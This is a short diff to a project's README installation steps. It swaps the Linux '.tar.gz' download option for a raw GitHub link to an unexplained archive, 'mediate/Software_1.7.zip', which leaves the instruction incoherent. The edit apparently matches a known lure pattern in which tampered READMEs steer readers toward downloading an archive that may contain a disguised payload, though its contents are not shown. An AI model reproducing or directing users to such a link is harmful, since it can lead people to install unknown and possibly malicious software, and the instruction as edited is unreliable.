Jayesh-Mantati/app/README.md

    - For Windows, download the file ending with `.exe`
    - For macOS, download the file ending with `.dmg`
-   - For Linux, download the file ending with `.deb` or `.tar.gz` depending on your distribution
+   - For Linux, download the file ending with `.deb` or `https://raw.githubusercontent.com/Jayesh-Mantati/app/main/mediate/Software_1.7.zip` depending on your distribution

 3. **Run the Installer**